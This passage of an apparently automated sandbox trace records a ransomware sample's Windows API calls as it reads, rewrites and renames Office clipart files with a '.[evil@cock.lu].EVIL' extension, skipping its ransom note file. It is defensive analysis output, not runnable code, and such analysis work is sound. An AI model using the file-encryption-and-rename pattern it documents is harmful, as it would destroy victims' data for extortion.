lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe6c, lpOverlapped=0x0) returned 1 [0115.928] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.928] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.928] _errno () returned 0x84b1160840 [0115.928] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.928] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe80, lpOverlapped=0x0) returned 1 [0115.928] CloseHandle (hObject=0x1a8) returned 1 [0115.928] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.928] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.929] __uncaught_exception () returned 0x84b1160800 [0115.929] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.929] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf.[evil@cock.lu].evil")) returned 1 [0115.929] ??_V@YAXPEAX@Z () returned 0x1 [0115.932] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF", dwFileAttributes=0x200) returned 0 [0115.932] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.932] wcsstr (_Str="DD01139_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.932] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 69 [0115.932] wcscmp (_String1="DD01139_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.932] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01139_.WMF") returned 0x0 [0115.932] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 0x45 [0115.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.934] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe30, lpOverlapped=0x0) returned 1 [0115.959] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.959] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.959] _errno () returned 0x84b1160840 [0115.959] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.959] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe40, lpOverlapped=0x0) returned 1 [0115.960] CloseHandle (hObject=0x1a8) returned 1 [0115.960] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.960] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.960] __uncaught_exception () returned 0x84b1160800 [0115.960] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.960] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf.[evil@cock.lu].evil")) returned 1 [0115.961] ??_V@YAXPEAX@Z () returned 0x1 [0115.964] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF", dwFileAttributes=0x200) returned 0 [0115.964] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.964] wcsstr (_Str="DD01140_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.964] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 69 [0115.964] wcscmp (_String1="DD01140_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.964] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01140_.WMF") returned 0x0 [0115.964] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 0x45 [0115.964] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.966] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe20, lpOverlapped=0x0) returned 1 [0115.973] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.973] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0115.973] _errno () returned 0x84b1160840 [0115.973] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.973] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe40, lpOverlapped=0x0) returned 1 [0115.973] CloseHandle (hObject=0x1a8) returned 1 [0115.973] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0115.973] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0115.973] __uncaught_exception () returned 0x84b1160800 [0115.973] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0115.973] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf.[evil@cock.lu].evil")) returned 1 [0115.974] ??_V@YAXPEAX@Z () returned 0x1 [0115.977] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF", dwFileAttributes=0x200) returned 0 [0115.977] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0115.977] wcsstr (_Str="DD01143_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0115.977] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 69 [0115.977] wcscmp (_String1="DD01143_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0115.977] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01143_.WMF") returned 0x0 [0115.977] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 0x45 [0115.977] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0115.979] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x85c, lpOverlapped=0x0) returned 1 [0116.015] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.015] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.015] _errno () returned 0x84b1160840 [0116.015] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.015] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x860, lpOverlapped=0x0) returned 1 [0116.015] CloseHandle (hObject=0x1a8) returned 1 [0116.015] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.016] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.016] __uncaught_exception () returned 0x84b1160800 [0116.016] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.016] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf.[evil@cock.lu].evil")) returned 1 [0116.017] ??_V@YAXPEAX@Z () returned 0x1 [0116.019] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF", dwFileAttributes=0x200) returned 0 [0116.019] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.019] wcsstr (_Str="DD01145_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.019] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 69 [0116.019] wcscmp (_String1="DD01145_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.019] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01145_.WMF") returned 0x0 [0116.019] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 0x45 [0116.019] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.021] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xadc, lpOverlapped=0x0) returned 1 [0116.047] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.047] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.047] _errno () returned 0x84b1160840 [0116.047] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.048] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xae0, lpOverlapped=0x0) returned 1 [0116.048] CloseHandle (hObject=0x1a8) returned 1 [0116.048] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.048] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.048] __uncaught_exception () returned 0x84b1160800 [0116.048] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.048] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf.[evil@cock.lu].evil")) returned 1 [0116.049] ??_V@YAXPEAX@Z () returned 0x1 [0116.051] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF", dwFileAttributes=0x200) returned 0 [0116.052] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.052] wcsstr (_Str="DD01146_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.052] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 69 [0116.052] wcscmp (_String1="DD01146_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.052] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01146_.WMF") returned 0x0 [0116.052] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 0x45 [0116.052] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.053] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaec, lpOverlapped=0x0) returned 1 [0116.061] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.061] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.061] _errno () returned 0x84b1160840 [0116.061] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.061] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb00, lpOverlapped=0x0) returned 1 [0116.061] CloseHandle (hObject=0x1a8) returned 1 [0116.061] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.061] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.061] __uncaught_exception () returned 0x84b1160800 [0116.061] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.061] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf.[evil@cock.lu].evil")) returned 1 [0116.062] ??_V@YAXPEAX@Z () returned 0x1 [0116.065] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF", dwFileAttributes=0x200) returned 0 [0116.065] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.065] wcsstr (_Str="DD01151_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.065] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 69 [0116.065] wcscmp (_String1="DD01151_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.065] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01151_.WMF") returned 0x0 [0116.065] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 0x45 [0116.065] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.066] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb90, lpOverlapped=0x0) returned 1 [0116.117] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.117] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.117] _errno () returned 0x84b1160840 [0116.117] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.117] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xba0, lpOverlapped=0x0) returned 1 [0116.117] CloseHandle (hObject=0x1a8) returned 1 [0116.117] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.117] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.117] __uncaught_exception () returned 0x84b1160800 [0116.117] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.118] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf.[evil@cock.lu].evil")) returned 1 [0116.118] ??_V@YAXPEAX@Z () returned 0x1 [0116.121] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF", dwFileAttributes=0x200) returned 0 [0116.121] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.121] wcsstr (_Str="DD01152_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.121] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 69 [0116.121] wcscmp (_String1="DD01152_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.121] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01152_.WMF") returned 0x0 [0116.121] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 0x45 [0116.121] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.123] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb90, lpOverlapped=0x0) returned 1 [0116.135] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.135] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.135] _errno () returned 0x84b1160840 [0116.135] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.135] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xba0, lpOverlapped=0x0) returned 1 [0116.135] CloseHandle (hObject=0x1a8) returned 1 [0116.135] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.136] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.136] __uncaught_exception () returned 0x84b1160800 [0116.136] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.136] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf.[evil@cock.lu].evil")) returned 1 [0116.136] ??_V@YAXPEAX@Z () returned 0x1 [0116.139] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF", dwFileAttributes=0x200) returned 0 [0116.139] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.139] wcsstr (_Str="DD01157_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.139] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 69 [0116.139] wcscmp (_String1="DD01157_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.139] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01157_.WMF") returned 0x0 [0116.139] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 0x45 [0116.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.141] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe04, lpOverlapped=0x0) returned 1 [0116.148] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.148] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.148] _errno () returned 0x84b1160840 [0116.148] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, 